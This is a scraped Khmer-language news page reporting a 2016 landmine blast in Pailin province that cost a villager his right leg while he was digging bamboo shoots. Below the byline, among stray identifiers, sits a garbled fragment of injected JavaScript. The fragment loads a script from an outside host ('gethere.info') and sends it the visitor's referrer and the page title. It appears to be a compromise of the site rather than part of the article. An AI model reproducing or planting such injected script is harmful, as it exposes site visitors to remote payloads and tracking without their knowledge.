ព្រឹតិ្តការណ៍ថ្មីៗ

បុរសម្នាក់ជាន់មីនដាច់ជើង ខណ:ចូលជីកទំពាំងនៅជើងភ្នំ

2 ឆ្នាំ មុន 3 tnn_admin

ប៉ៃលិន៖ បុរសម្នាក់ត្រូវបានដាច់ជើង ខណ:ដែលបរុសរូបនោះបានចូលទៅរកទំពាំងនៅតាមជើងភ្នំយកមកចិញ្ចឹមក្រពះ តែអកុសលត្រូវជានមីន។ ហេតុការណ៏នេះបានកើតឡើងកាលពីវេលាម៉ោង៧និង៤៥នាទីព្រឹក ថ្ងៃទី១១ ខែតុលា ឆ្នាំ២០១៦ នៅចំនុចភ្នំកូនមាន់ ស្ថិតក្នុងភូមិបុស្អំ ឃុំស្ទឹងកាច់ ស្រុកសាលាក្រៅ ខេត្តប៉ៃលិន ។

 

បុរសដែលជារងគ្រោះមានឈ្មោះ គឹម ភឿន អាយុ៤៦ឆ្នាំ មានប្រពន្ធឈ្មោះ ទូច នាង អាយុ ៣៥ឆ្នាំ រស់នៅក្នុងភូមិ ឃុំ កើតហេតុខាងលើ។

 

បើតាមសំដីប្រពន្ធជនរងគ្រោះបានរៀបរាប់ឲ្យដឹងថា នៅពេលមុនដំបូងប្ដីរបស់គាត់បានប្រាប់ថា សុំទៅរកជីកទំពាំងនៅខាងកើតស្ទឹង ដោយលឺគេថា មានទំពាំងឬស្សីបានដុះច្រើនក្រោយពេលមានភ្លៀងធ្លាក់។ មិនយូរប៉ុន្មានបុរសជាប្ដីបានយកសំភារះ
កាន់ដើរទៅម្នាក់ឯងទាំងព្រឹក ហើយមួយសន្ទុះមកស្រាប់តែលឺផ្ទុះមីនហ៊ុយផ្សែង រូបនាង និងអ្នកភូមិមានការសង្ស័យនៅចំនុចនោះ ក៍នាំគ្នាទៅមើល។ លុះពេលជិតទៅដល់កន្លែងកើតហេតុស្រាប់តែលឺប្តីរបស់គាត់ស្រែកឱ្យជួយ ទើបដឹងថាប្តីរបស់គាត់ជាន់ មីនប្រឆាំងមនុស្ស (ប្រភេទមីនស្មាច់) បណ្តាលឱ្យរងរបួសធ្ងន់ ដាច់ជើងស្តាំ និងរបួសប្រអប់ជើងឆ្វេងយ៉ាងធ្ងន់ធ្ងរ។

ក្រោយកើតហេតុអ្នកភូមិក៍បានយកអង្រឹងសែងជនរងគ្រោះមកកាន់ រថយន្តសង្គ្រោះដឹកមកព្យាបាលនៅមន្ទីរពេទ្យបង្អែកខេត្តប៉ៃលិន ដើម្បីឱ្យក្រុមគ្រូពេទ្យធ្វើការសង្គ្រោះបន្ទាន់។ ដោយ៖ ញ៉ឹប បូរី

2a1589d9-9288-43a0-aecf-21363365d3bc 4b78e2dc-7e74-4398-a4d0-1b2645eb6c9a c2499c6f-de79-4fe5-aa3c-42f987f43669s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!